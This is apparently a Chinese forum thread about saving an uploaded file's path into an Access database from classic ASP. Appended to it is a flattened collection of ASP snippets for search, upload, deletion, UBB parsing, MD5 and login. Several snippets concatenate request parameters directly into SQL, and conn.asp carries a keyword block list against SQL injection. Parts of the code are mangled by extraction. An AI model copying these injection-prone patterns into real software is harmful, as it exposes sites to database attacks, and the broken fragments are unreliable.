如何将&formPath&File.FileName&这种字段读入数据库?

cwdn 2002-07-20 09:21:10
麻烦死了,谁能帮帮我?

<!--#include FILE="upload_5xsoft.inc"-->
<html>
<head>
<title>文件上传</title>
</head>
<body>
<br>文件上传!<hr size=1 noshadow width=300 align=left><br><br>

<%
dim upload,file,formName,formPath,iCount
set upload=new upload_5xSoft ''建立上传对象

response.write upload.Version&"<br><br>" ''显示上传类的版本

if upload.form("filepath")="" then ''得到上传目录
HtmEnd "请输入要上传至的目录!"
set upload=nothing
response.end
else
formPath=upload.form("filepath")
''在目录后加(/)
if right(formPath,1)<>"/" then formPath=formPath&"/"
end if
dim rs1
dim rs

Set rs1=Server.CreateObject("ADODB.command")
set rs=server.createobject("ADODB.Recordset")
rs1.CommandText = "SELECT * FROM sp where 日期=date() "
rs1.CommandType = 1
Set rs1.ActiveConnection = conn
rs.Open rs1, , 1, 3
rs.addnew


iCount=0
for each formName in upload.file ''列出所有上传了的文件
set file=upload.file(formName) ''生成一个文件对象
if file.FileSize>0 then ''如果 FileSize > 0 说明有文件数据
file.SaveAs Server.mappath(formPath&file.FileName) ''保存文件
rs("dt")="&formPath&File.FileName&"
response.write file.FilePath&file.FileName&" ("&file.FileSize&") => "&formPath&File.FileName&" 成功!<br>"
iCount=iCount+1
end if
set file=nothing
next
set upload=nothing ''删除此对象
Htmend iCount&" 个文件上传结束!"

sub HtmEnd(Msg)
set upload=nothing
response.write "<br>"&Msg&" [<a href=""javascript:history.back();"">返回</a>]</body></html>"
response.end
end sub
%>
...全文
126 9 打赏 收藏 转发到动态 举报
写回复
用AI写文章
9 条回复
切换为时间正序
请发表友善的回复…
发表回复
cwdn 2002-07-22
  • 打赏
  • 举报
 回复
还是不行
cwdn 2002-07-20
  • 打赏
  • 举报
 回复
sql="insert into sp(dt)values('"&formPath&File.FileName&"')"
conn.execute(sql)
出现报错
Microsoft JET Database Engine (0x80040E14)
cmsoft 2002-07-20
  • 打赏
  • 举报
 回复
sql="insert into sp(dt)values('"&formPath&File.FileName&"')"
conn.execute(sql)
cwdn 2002-07-20
  • 打赏
  • 举报
 回复

&formPath&File.FileName& 不能接受Recordset
skyarrow 2002-07-20
  • 打赏
  • 举报
 回复
rs("dt")="&formPath&File.FileName&"
改为
rs("dt")="&formPath&File.FileName&"
rs.update
cmsoft 2002-07-20
  • 打赏
  • 举报
 回复
rs("dt")="&formPath&File.FileName&"
这句什么意思?
写成这样吧:
sql="insert into tblname("……")values("……")"
conn.execute(sql)
yonghengdizhen 2002-07-20
  • 打赏
  • 举报
 回复

sql也Response.Write出来。
检查你的最终执行的SQL文本,在数据环境中测试一下运行结果。
yonghengdizhen 2002-07-20
  • 打赏
  • 举报
 回复
Response.Write formPath&File.FileName
Response.End
看看,估计可能在你的formPath&File.FileName中有SQL非法字符
cwdn 2002-07-20
  • 打赏
  • 举报
 回复
怎么?!没人回答了,

又要浪费这一百分?
ASP无组件多文件上传
ASP无组件上传,大家可以根据自己的实际情况进行修改。
asp连接数据库代码实例
连接数据库代码实例 1,连接数据库代码 文件名称 conn.asp 所有访问数据库的文件都调用此文件 <% db=\"data/data.mdb\" \'数据库存放目录 on error resume next set conn=server.createobject(\"adodb.connection\") conn.open \"driver={microsoft access driver (*.mdb)};dbq=\"&server.mappath(db) if err then err.clear set conn = Nothing response.write \"数据库连接出错,请检查conn.asp中的连接字符串。\" response.end end if function CloseDB Conn.Close set Conn=Nothing End Function %> <% dim badword badword=\"\'|and|select|update|chr|delete|%20from|;|insert|mid|master.|set|chr(37)|=\" if request.QueryString<>\"\" then chk=split(badword,\"|\") for each query_name in request.querystring for i=0 to ubound(chk) if instr(lcase(request.querystring(query_name)),chk(i))<>0 then response.write \"<script language=javascript>alert(\'传参错误!参数 \"&query_name&\" 的值中包含非法字符串!\\n\\n\');location=\'\"&request.ServerVariables(\"HTTP_REFERER\")&\"\'\" response.end end if next next end if %> ---------------------------------------------- 2。增加纪录 <% if request(\"action\")=\"add\" then name=request.form(\"name\") content=request.form(\"content\") set rs=server.createobject(\"adodb.recordset\") sql=\"select * from biao\" rs.open sql,conn,3,2 rs.addnew rs(\"name\")=name if content<>\"\" then rs(\"content\")=content else rs(\"content\")=null end if rs(\"date\")=date() rs.update rs.close set rs=nothing response.write \"<script language=javascript>alert(\'添加成功!\');location.href(\'index.asp\'); -------------------------------------- 3.显示记录 <% set rs=server.createobject(\"adodb.recordset\") sql=\"select * from biao order by id desc\" \'sql=\"select top 10 * from biao order by id desc\" rs.open sql,conn,1,1 rs.pagesize=15 \'-------设置每页显示的记录数 dim page page=request(\"page\") if page<>\"\" and IsNumeric(page) then page=clng(page) else page=1 end if n=rs.pagecount if page>n then page=clng(n) end if if rs.eof then response.write\"暂没有信息!\" \'response.end else rs.absolutepage=page end if i=0 do while not rs.eof and i --------如果是每行显示n个纪录开始---------------------------- <% do while not rs.eof and i\" end if %> --------如果是每行显示n个纪录结束----------------------------- <%=rs(\"id\")%> <% rs.movenext i=i+1 loop %> <% response.write(\"共\"&rs.recordcount&\"条信息   \") if page<>1 then response.write(\"首页 \") else response.write(\"首页 \") end if if page>1 then response.write(\"上一页 \") else response.write(\"上一页 \") end if if page下一页 \") else response.write(\"下一页 \") end if if page<>n then response.write(\"尾页 \") else response.write(\"尾页 \") end if response.write(\"   当前页:\"&page&\"/\"&n&\"\") %> 转到: form> ------search.asp--------------- <% if request("keyword")<>"" and request("select")<>"" then sql="select * from biao where "&request("select")&" like '%"&request("keyword")&"%'" elseif request("keyword")<>"" and request("select")="all" then sql="select * from biao where name like '%"&request("keyword")&"%' or id like '%"&request("keyword")&"%' or content like '%"&request("keyword")&"%'" else response.redirect("index.asp") end if set rs=server.createobject("adodb.recordset") rs.open sql,conn,1,1 rs.pagesize=15 '-------设置每页显示的记录数 dim page page=request("page") if page<>"" and IsNumeric(page) then page=clng(page) else page=1 end if n=rs.pagecount if page>n then page=clng(n) end if if rs.eof then response.write"查询的信息不存在或者已经删除!" 'response.end else rs.absolutepage=page end if i=0 do while not rs.eof and i <%=rs("id")%> <% rs.movenext i=i+1 loop %> ----------------------------------------- 6.有分类的纪录代码 ---------------显示分类开始--------------------------------- <% set rs=server.createobject("adodb.recordset") sql="select all * from class order by id desc" rs.open sql,conn,1,1 do while not rs.eof %> "><%=rs("classname")%> <% rs.movenext i=i+1 loop %> ---------------显示分类结束-------------------------- -------------显示现在所在分类开始------------------- <% set rs=server.createobject("adodb.recordset") sql="select top 1 * from class where classname='"&request("classname")&"'" rs.open sql,conn,1,1 do while not rs.eof %> <%=rs("classname")%> <% rs.movenext i=i+1 loop %> -----------显示现在所在分类结束---------------------- -----------显示此分类的纪录开始------------ <% set rs=server.createobject("adodb.recordset") sql="select * from biao where fenlei='"&request("classname")&"'" rs.open sql,conn,1,1 rs.pagesize=10 '-------设置每页显示的记录数 dim page page=request("page") if page<>"" and IsNumeric(page) then page=clng(page) else page=1 end if n=rs.pagecount if page>n then page=clng(n) end if if rs.bof or rs.eof then response.write"暂没有任何数据!" 'response.end else rs.absolutepage=page end if i=0 do while not rs.eof and i <%=rs("id")%> <% rs.movenext i=i+1 loop %> --------------显示此分类的纪录结束---------------- ---------删除所在分类纪录开始------------ <% if request("classname")<>"" then%> " title="删除所有本类信息?" onClick="{if (confirm('您确定要删除所有信息吗?')){return true;}return false;}">清空所有本类信息 <%end if%> if request("action")="del_fenlei" then classname=request("classname") conn.execute("delete * from biao where fenlei='"&classname&"'") CloseDB response.write"<script language='javascript'>alert('删除本类成功!');location.href('?action=manage');file/softpic) 上传文件的页面(调用upsoftpic.asp) <form name="form" method="post" action="?action=add" onsubmit="return chkform(this)"> form> upsoftpic.asp <form action="Upfile.asp?action=upsoftpic" method="POST" enctype="multipart/form-data" class="fontmenu2" onsubmit="up.disabled=true;up.value='上传中,请稍候……'"> form> upfile.asp <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <%Server.ScriptTimeout=999%> <% if request("action")="upsoftpic" then set upload=new upload_5xsoft set file=upload.file("softpic") fileExt=lcase(right(file.filename,4)) if fileEXT<>".jpg" and fileEXT<>".gif" and fileEXT<>".rar" then '---设置上传类型 ++++fileEXT<>".***"++++++++ response.write"<script>alert('格式不对,请重新上传!');location='"&request.ServerVariables("HTTP_REFERER")&"'file.fileSize>0 then formPath="upfile/softpic" '-------上传路径 'formPath="../upfile/softpic" if right(formPath,1)<>"/" then formPath=formPath&"/" end if vfname = filename(now()) fname = vfname & "." & GetExtendName(file.FileName) file.SaveAs Server.mappath(formPath&fname) ''保存文件 %> <script> parent.form.picurl.value+='upfile/softpic/<%=fname%>' //-上传路径 //parent.frmadd.dreamcontent.value+='[img]upload/<%=ufp%>[/img]' location.replace('Upsoftpic.asp') //---返回文件 file=nothing set upload=nothing function filename(fname) fname = now() fname = replace(fname,"-","") fname = replace(fname," ","") fname = replace(fname,":","") fname = replace(fname,"PM","") fname = replace(fname,"AM","") fname = replace(fname,"上午","") fname = replace(fname,"下午","") filename=fname end function function GetExtendName(FileName) dim ExtName ExtName = LCase(FileName) ExtName = right(ExtName,3) ExtName = right(ExtName,3-Instr(ExtName,".")) GetExtendName = ExtName end function end if %> upload.asp 删除文件和记录 <% if request("action")="manage" then call manage() end if if request("action")="edit" then id=request("id") set rs=server.createobject("adodb.recordset") sql="select * from biao where id="&id&"" rs.open sql,conn,1,1 call edit() end if if request("action")="del" then set rs=server.createobject("adodb.recordset") sql="select * from biao where id="&request("id")&"" rs.open sql,conn,3,2 set fileobj=server.createobject("scripting.filesystemobject") if fileobj.FileExists(server.mappath(""&rs("picurl"))) then fileobj.DeleteFile server.mappath(""&rs("picurl")) end if rs.delete conn.close response.write"<script language='javascript'>alert('删除成功!');location.href('?action=manage');fileobj=server.createobject("scripting.filesystemobject") i=0 do while not(rs.bof or rs.eof) and ifileobj.FileExists(server.mappath(""&rs("picurl"))) then'-----------("../" &rs("picurl"))) then fileobj.DeleteFile server.mappath(""&rs("picurl")) end if rs.movenext i=i+1 loop conn.execute("delete * from biao") conn.close response.write"<script language='javascript'>alert('所有已成功删除!');location.href('?action=manage');form("name") picurl=request.form("picurl") hits=request.form("hits") content=request.form("content") set rs=server.createobject("adodb.recordset") sql="select * from biao where id="&request("id")&"" rs.open sql,conn,3,2 rs("name")=name rs("content")=content rs("picurl")=picurl rs("hits")=hits rs.update conn.close set rs=nothing response.write "<script language=javascript>alert('编辑成功!');location.href('?id="&request("id")&"&action=edit'); 删除文件 &struploadfiles=<%=rs("picurl")%>&action=delsoftpic" onClick="{if (confirm('您确定要删除这个吗?')){return true;}return false;}">删除 -------------------------------- --*delfile.asp内容*--- <%if request("action")="delsoftpic" then picurl=request.form("picurl") set rs=server.createobject("adodb.recordset") sql="select * from biao where id="&request("id")&"" rs.open sql,conn,3,2 rs("picurl")=null struploadfiles=trim(request.querystring("struploadfiles")) action=trim(request.querystring("action")) dim fso,arruploadfiles,i set fso = createobject("scripting.filesystemobject") fso.deletefile(server.mappath("" & struploadfiles)) set fso = nothing rs.update conn.close set rs=nothing response.write"<script language='javascript'>alert('删除成功!');location.href('edit.asp?id="&request("id")&"&action=edit'); [返回] 8。有关ubb ----------ubbcode.asp-------------- <% const ImagePath="images/emot/" function UBBCode(strContent) strContent= FilterJS(strContent) dim re dim po,ii dim reContent Set re=new RegExp re.IgnoreCase =true re.Global=True po=0 ii=0 re.Pattern="[UPLOAD=(gif|jpg|jpeg|bmp|png)](.[^[]*)(gif|jpg|jpeg|bmp)[/UPLOAD]" strContent=re.replace(strContent,"
此主题相关图片如下:
转动滚轮可缩放图片") re.Pattern="[IMG](http|https|ftp)://(.[^[]*)[/IMG]" strContent=re.replace(strContent,"转动滚轮可缩放图片;按此在新窗口浏览图片") re.Pattern="[DIR=*([0-9]*),*([0-9]*)](.[^[]*)[/DIR]" strContent=re.Replace(strContent,"") re.Pattern="[QT=*([0-9]*),*([0-9]*)](.[^[]*)[/QT]" strContent=re.Replace(strContent,"") re.Pattern="[MP=*([0-9]*),*([0-9]*)](.[^[]*)[/MP]" strContent=re.Replace(strContent,"Filename value=$3>") re.Pattern="[RM=*([0-9]*),*([0-9]*)](.[^[]*)[/RM]" strContent=re.Replace(strContent,"
") re.Pattern="([FLASH])(.[^[]*)([/FLASH])" strContent= re.Replace(strContent,"点击开新窗口欣赏该FLASH动画![全屏欣赏]
$2") re.Pattern="([FLASH=*([0-9]*),*([0-9]*)])(.[^[]*)([/FLASH])" strContent= re.Replace(strContent,"点击开新窗口欣赏该FLASH动画![全屏欣赏]
$4") re.Pattern="([URL])(.[^[]*)([/URL])" strContent= re.Replace(strContent,"$2") re.Pattern="([URL=(.[^[]*)])(.[^[]*)([/URL])" strContent= re.Replace(strContent,"$3") re.Pattern="([EMAIL])(S+@.[^[]*)([/EMAIL])" strContent= re.Replace(strContent,"$2") re.Pattern="([EMAIL=(S+@.[^[]*)])(.[^[]*)([/EMAIL])" strContent= re.Replace(strContent,"$3") '自动识别网址 're.Pattern = "^((http|https|ftp|rtsp|mms):(//|\\)[A-Za-z0-9./=?%-&_~`@':+!]+)" 'strContent = re.Replace(strContent,"$1") 're.Pattern = "((http|https|ftp|rtsp|mms):(//|\\)[A-Za-z0-9./=?%-&_~`@':+!]+)$" 'strContent = re.Replace(strContent,"$1") 're.Pattern = "([^>=""])((http|https|ftp|rtsp|mms):(//|\\)[A-Za-z0-9./=?%-&_~`@':+!]+)" 'strContent = re.Replace(strContent,"$1$2") '自动识别www等开头的网址 're.Pattern = "([^(http://|http:\)])((www|cn)[.](w)+[.]{1,}(net|com|cn|org|cc)(((/[~]*|\[~]*)(w)+)|[.](w)+)*(((([?](w)+){1}[=]*))*((w)+){1}([&](w)+[=](w)+)*)*)" 'strContent = re.Replace(strContent,"$2") '自动识别Email地址,如打开本功能在浏览内容很多的帖子会引起服务器停顿 're.Pattern = "([^(=)])((w)+[@]{1}((w)+[.]){1,3}(w)+)" 'strContent = re.Replace(strContent,"$2") re.Pattern="[em(.[^[]*)]" strContent=re.Replace(strContent,"") re.Pattern="[HTML](.[^[]*)[/HTML]" strContent=re.Replace(strContent,"
以下内容为程序代码:
$1
") re.Pattern="[code](.[^[]*)[/code]" strContent=re.Replace(strContent,"
以下内容为程序代码:
$1
") re.Pattern="[color=(.[^[]*)](.[^[]*)[/color]" strContent=re.Replace(strContent,"$2") re.Pattern="[face=(.[^[]*)](.[^[]*)[/face]" strContent=re.Replace(strContent,"$2") re.Pattern="[align=(center|left|right)](.*)[/align]" strContent=re.Replace(strContent,"
$2
") re.Pattern="[QUOTE](.*)[/QUOTE]" strContent=re.Replace(strContent,"
$1

") re.Pattern="[fly](.*)[/fly]" strContent=re.Replace(strContent,"$1") re.Pattern="[move](.*)[/move]" strContent=re.Replace(strContent,"$1") re.Pattern="[GLOW=*([0-9]*),*(#*[a-z0-9]*),*([0-9]*)](.[^[]*)[/GLOW]" strContent=re.Replace(strContent,"$4
") re.Pattern="[SHADOW=*([0-9]*),*(#*[a-z0-9]*),*([0-9]*)](.[^[]*)[/SHADOW]" strContent=re.Replace(strContent,"$4
") re.Pattern="[i](.[^[]*)[/i]" strContent=re.Replace(strContent,"$1") re.Pattern="[u](.[^[]*)([/u])" strContent=re.Replace(strContent,"$1") re.Pattern="[b](.[^[]*)([/b])" strContent=re.Replace(strContent,"$1") re.Pattern="[size=([1-4])](.[^[]*)[/size]" strContent=re.Replace(strContent,"$2") strContent=replace(strContent,"","") set re=Nothing UBBCode=strContent end function Function FilterJS(v) if not isnull(v) then dim t dim re dim reContent Set re=new RegExp re.IgnoreCase =true re.Global=True re.Pattern="(javascript)" t=re.Replace(v,"javascript") re.Pattern="(jscript:)" t=re.Replace(t,"jscript:") re.Pattern="(js:)" t=re.Replace(t,"js:") 're.Pattern="(value)" 't=re.Replace(t,"value") re.Pattern="(about:)" t=re.Replace(t,"about:") re.Pattern="(file:)" t=re.Replace(t,"file:") re.Pattern="(document.cookie)" t=re.Replace(t,"documents.cookie") re.Pattern="(vbscript:)" t=re.Replace(t,"vbscript:") re.Pattern="(vbs:)" t=re.Replace(t,"vbs:") re.Pattern="(on(mouse|exit|error|click|key))" t=re.Replace(t,"on$2") 're.Pattern="(&#)" 't=re.Replace(t,"&#") FilterJS=t set re=nothing end if End Function function HTMLEncode(fString) if not isnull(fString) then fString = replace(fString, ">", ">") fString = replace(fString, "<", "<") fString = Replace(fString, CHR(32), " ") fString = Replace(fString, CHR(9), " ") fString = Replace(fString, CHR(34), """) fString = Replace(fString, CHR(39), "'") fString = Replace(fString, CHR(13), "") fString = Replace(fString, CHR(10) & CHR(10), "

") fString = Replace(fString, CHR(10), "
") HTMLEncode = fString end if end function function nohtml(str) dim re Set re=new RegExp re.IgnoreCase =true re.Global=True re.Pattern="(<.[^<]*>)" str=re.replace(str," ") re.Pattern="()" str=re.replace(str," ") nohtml=str set re=nothing end function function cutStr(str,strlen) dim l,t,c l=len(str) t=0 for i=1 to l c=Abs(Asc(Mid(str,i,1))) if c>255 then t=t+2 else t=t+1 end if if t>=strlen then cutStr=left(str,i)&".." exit for else cutStr=str end if next cutStr=replace(cutStr,chr(10),"") end function %> '----------ubbcode.asp结束----------------------------- <%=left(rs("name"),6)%> <%=ubbcode(rs("content"))%> <%=Server.HTMLEncode(rs("content"))%> ----------------------字符截取开始------------------------------- <% if len(rs("name"))>10 then response.write ""&left(rs("name"),10)&".." else response.write ""&rs("name")&"" end if %> ----------------------字符截取结束--------------------------------- 9。有关后台登陆 chk.asp <% if session("admin")="" then response.redirect"index.asp" end if %> md5.asp <% Private Const BITS_TO_A_BYTE = 8 Private Const BYTES_TO_A_WORD = 4 Private Const BITS_TO_A_WORD = 32 Private m_lOnBits(30) Private m_l2Power(30) Private Function LShift(lValue, iShiftBits) If iShiftBits = 0 Then LShift = lValue Exit Function ElseIf iShiftBits = 31 Then If lValue And 1 Then LShift = &H80000000 Else LShift = 0 End If Exit Function ElseIf iShiftBits < 0 Or iShiftBits > 31 Then Err.Raise 6 End If If (lValue And m_l2Power(31 - iShiftBits)) Then LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000 Else LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits)) End If End Function Private Function RShift(lValue, iShiftBits) If iShiftBits = 0 Then RShift = lValue Exit Function ElseIf iShiftBits = 31 Then If lValue And &H80000000 Then RShift = 1 Else RShift = 0 End If Exit Function ElseIf iShiftBits < 0 Or iShiftBits > 31 Then Err.Raise 6 End If RShift = (lValue And &H7FFFFFFE) m_l2Power(iShiftBits) If (lValue And &H80000000) Then RShift = (RShift Or (&H40000000 m_l2Power(iShiftBits - 1))) End If End Function Private Function RotateLeft(lValue, iShiftBits) RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits)) End Function Private Function AddUnsigned(lX, lY) Dim lX4 Dim lY4 Dim lX8 Dim lY8 Dim lResult lX8 = lX And &H80000000 lY8 = lY And &H80000000 lX4 = lX And &H40000000 lY4 = lY And &H40000000 lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF) If lX4 And lY4 Then lResult = lResult Xor &H80000000 Xor lX8 Xor lY8 ElseIf lX4 Or lY4 Then If lResult And &H40000000 Then lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8 Else lResult = lResult Xor &H40000000 Xor lX8 Xor lY8 End If Else lResult = lResult Xor lX8 Xor lY8 End If AddUnsigned = lResult End Function Private Function md5_F(x, y, z) md5_F = (x And y) Or ((Not x) And z) End Function Private Function md5_G(x, y, z) md5_G = (x And z) Or (y And (Not z)) End Function Private Function md5_H(x, y, z) md5_H = (x Xor y Xor z) End Function Private Function md5_I(x, y, z) md5_I = (y Xor (x Or (Not z))) End Function Private Sub md5_FF(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_F(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub md5_GG(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_G(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub md5_HH(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_H(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Sub md5_II(a, b, c, d, x, s, ac) a = AddUnsigned(a, AddUnsigned(AddUnsigned(md5_I(b, c, d), x), ac)) a = RotateLeft(a, s) a = AddUnsigned(a, b) End Sub Private Function ConvertToWordArray(sMessage) Dim lMessageLength Dim lNumberOfWords Dim lWordArray() Dim lBytePosition Dim lByteCount Dim lWordCount Const MODULUS_BITS = 512 Const CONGRUENT_BITS = 448 lMessageLength = Len(sMessage) lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) BITS_TO_A_BYTE)) (MODULUS_BITS BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS BITS_TO_A_WORD) ReDim lWordArray(lNumberOfWords - 1) lBytePosition = 0 lByteCount = 0 Do Until lByteCount >= lMessageLength lWordCount = lByteCount BYTES_TO_A_WORD lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition) lByteCount = lByteCount + 1 Loop lWordCount = lByteCount BYTES_TO_A_WORD lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition) lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3) lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29) ConvertToWordArray = lWordArray End Function Private Function WordToHex(lValue) Dim lByte Dim lCount For lCount = 0 To 3 lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1) WordToHex = WordToHex & Right("0" & Hex(lByte), 2) Next End Function Public Function MD5(sMessage) m_lOnBits(0) = CLng(1) m_lOnBits(1) = CLng(3) m_lOnBits(2) = CLng(7) m_lOnBits(3) = CLng(15) m_lOnBits(4) = CLng(31) m_lOnBits(5) = CLng(63) m_lOnBits(6) = CLng(127) m_lOnBits(7) = CLng(255) m_lOnBits(8) = CLng(511) m_lOnBits(9) = CLng(1023) m_lOnBits(10) = CLng(2047) m_lOnBits(11) = CLng(4095) m_lOnBits(12) = CLng(8191) m_lOnBits(13) = CLng(16383) m_lOnBits(14) = CLng(32767) m_lOnBits(15) = CLng(65535) m_lOnBits(16) = CLng(131071) m_lOnBits(17) = CLng(262143) m_lOnBits(18) = CLng(524287) m_lOnBits(19) = CLng(1048575) m_lOnBits(20) = CLng(2097151) m_lOnBits(21) = CLng(4194303) m_lOnBits(22) = CLng(8388607) m_lOnBits(23) = CLng(16777215) m_lOnBits(24) = CLng(33554431) m_lOnBits(25) = CLng(67108863) m_lOnBits(26) = CLng(134217727) m_lOnBits(27) = CLng(268435455) m_lOnBits(28) = CLng(536870911) m_lOnBits(29) = CLng(1073741823) m_lOnBits(30) = CLng(2147483647) m_l2Power(0) = CLng(1) m_l2Power(1) = CLng(2) m_l2Power(2) = CLng(4) m_l2Power(3) = CLng(8) m_l2Power(4) = CLng(16) m_l2Power(5) = CLng(32) m_l2Power(6) = CLng(64) m_l2Power(7) = CLng(128) m_l2Power(8) = CLng(256) m_l2Power(9) = CLng(512) m_l2Power(10) = CLng(1024) m_l2Power(11) = CLng(2048) m_l2Power(12) = CLng(4096) m_l2Power(13) = CLng(8192) m_l2Power(14) = CLng(16384) m_l2Power(15) = CLng(32768) m_l2Power(16) = CLng(65536) m_l2Power(17) = CLng(131072) m_l2Power(18) = CLng(262144) m_l2Power(19) = CLng(524288) m_l2Power(20) = CLng(1048576) m_l2Power(21) = CLng(2097152) m_l2Power(22) = CLng(4194304) m_l2Power(23) = CLng(8388608) m_l2Power(24) = CLng(16777216) m_l2Power(25) = CLng(33554432) m_l2Power(26) = CLng(67108864) m_l2Power(27) = CLng(134217728) m_l2Power(28) = CLng(268435456) m_l2Power(29) = CLng(536870912) m_l2Power(30) = CLng(1073741824) Dim x Dim k Dim AA Dim BB Dim CC Dim DD Dim a Dim b Dim c Dim d Const S11 = 7 Const S12 = 12 Const S13 = 17 Const S14 = 22 Const S21 = 5 Const S22 = 9 Const S23 = 14 Const S24 = 20 Const S31 = 4 Const S32 = 11 Const S33 = 16 Const S34 = 23 Const S41 = 6 Const S42 = 10 Const S43 = 15 Const S44 = 21 x = ConvertToWordArray(sMessage) a = &H67452301 b = &HEFCDAB89 c = &H98BADCFE d = &H10325476 For k = 0 To UBound(x) Step 16 AA = a BB = b CC = c DD = d md5_FF a, b, c, d, x(k + 0), S11, &HD76AA478 md5_FF d, a, b, c, x(k + 1), S12, &HE8C7B756 md5_FF c, d, a, b, x(k + 2), S13, &H242070DB md5_FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE md5_FF a, b, c, d, x(k + 4), S11, &HF57C0FAF md5_FF d, a, b, c, x(k + 5), S12, &H4787C62A md5_FF c, d, a, b, x(k + 6), S13, &HA8304613 md5_FF b, c, d, a, x(k + 7), S14, &HFD469501 md5_FF a, b, c, d, x(k + 8), S11, &H698098D8 md5_FF d, a, b, c, x(k + 9), S12, &H8B44F7AF md5_FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1 md5_FF b, c, d, a, x(k + 11), S14, &H895CD7BE md5_FF a, b, c, d, x(k + 12), S11, &H6B901122 md5_FF d, a, b, c, x(k + 13), S12, &HFD987193 md5_FF c, d, a, b, x(k + 14), S13, &HA679438E md5_FF b, c, d, a, x(k + 15), S14, &H49B40821 md5_GG a, b, c, d, x(k + 1), S21, &HF61E2562 md5_GG d, a, b, c, x(k + 6), S22, &HC040B340 md5_GG c, d, a, b, x(k + 11), S23, &H265E5A51 md5_GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA md5_GG a, b, c, d, x(k + 5), S21, &HD62F105D md5_GG d, a, b, c, x(k + 10), S22, &H2441453 md5_GG c, d, a, b, x(k + 15), S23, &HD8A1E681 md5_GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8 md5_GG a, b, c, d, x(k + 9), S21, &H21E1CDE6 md5_GG d, a, b, c, x(k + 14), S22, &HC33707D6 md5_GG c, d, a, b, x(k + 3), S23, &HF4D50D87 md5_GG b, c, d, a, x(k + 8), S24, &H455A14ED md5_GG a, b, c, d, x(k + 13), S21, &HA9E3E905 md5_GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8 md5_GG c, d, a, b, x(k + 7), S23, &H676F02D9 md5_GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A md5_HH a, b, c, d, x(k + 5), S31, &HFFFA3942 md5_HH d, a, b, c, x(k + 8), S32, &H8771F681 md5_HH c, d, a, b, x(k + 11), S33, &H6D9D6122 md5_HH b, c, d, a, x(k + 14), S34, &HFDE5380C md5_HH a, b, c, d, x(k + 1), S31, &HA4BEEA44 md5_HH d, a, b, c, x(k + 4), S32, &H4BDECFA9 md5_HH c, d, a, b, x(k + 7), S33, &HF6BB4B60 md5_HH b, c, d, a, x(k + 10), S34, &HBEBFBC70 md5_HH a, b, c, d, x(k + 13), S31, &H289B7EC6 md5_HH d, a, b, c, x(k + 0), S32, &HEAA127FA md5_HH c, d, a, b, x(k + 3), S33, &HD4EF3085 md5_HH b, c, d, a, x(k + 6), S34, &H4881D05 md5_HH a, b, c, d, x(k + 9), S31, &HD9D4D039 md5_HH d, a, b, c, x(k + 12), S32, &HE6DB99E5 md5_HH c, d, a, b, x(k + 15), S33, &H1FA27CF8 md5_HH b, c, d, a, x(k + 2), S34, &HC4AC5665 md5_II a, b, c, d, x(k + 0), S41, &HF4292244 md5_II d, a, b, c, x(k + 7), S42, &H432AFF97 md5_II c, d, a, b, x(k + 14), S43, &HAB9423A7 md5_II b, c, d, a, x(k + 5), S44, &HFC93A039 md5_II a, b, c, d, x(k + 12), S41, &H655B59C3 md5_II d, a, b, c, x(k + 3), S42, &H8F0CCC92 md5_II c, d, a, b, x(k + 10), S43, &HFFEFF47D md5_II b, c, d, a, x(k + 1), S44, &H85845DD1 md5_II a, b, c, d, x(k + 8), S41, &H6FA87E4F md5_II d, a, b, c, x(k + 15), S42, &HFE2CE6E0 md5_II c, d, a, b, x(k + 6), S43, &HA3014314 md5_II b, c, d, a, x(k + 13), S44, &H4E0811A1 md5_II a, b, c, d, x(k + 4), S41, &HF7537E82 md5_II d, a, b, c, x(k + 11), S42, &HBD3AF235 md5_II c, d, a, b, x(k + 2), S43, &H2AD7D2BB md5_II b, c, d, a, x(k + 9), S44, &HEB86D391 a = AddUnsigned(a, AA) b = AddUnsigned(b, BB) c = AddUnsigned(c, CC) d = AddUnsigned(d, DD) Next 'MD5 = LCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d)) MD5=LCase(WordToHex(b) & WordToHex(c)) 'I crop this to fit 16byte database password :D End Function %> index.asp(登陆页面) <form method="post" action="Log.asp?action=login" onsubmit="return chklogin(this)"> form> log.asp <% Session.TimeOut=30 if request("action")="login" then admin=trim(request.form("admin")) for i=1 to len(admin) '用MID函数读出变量admin中i 位置的一个字符 manage=mid(admin,i,1) if manage="'" or manage="%" or manage="<" or manage=">" or manage="&" then '如果admin中含有' % < > &字符就转到出错页面 response.redirect "Error.asp" response.end end if next pwd=trim(request.form("pwd")) for i=1 to len(pwd) '用MID函数读出变量pwd中i 位置的一个字符 pass=mid(pwd,i,1) if pass="'" or pass="%" or pass="<" or pass=">" or pass="&" then '如果pass中含有' % < > 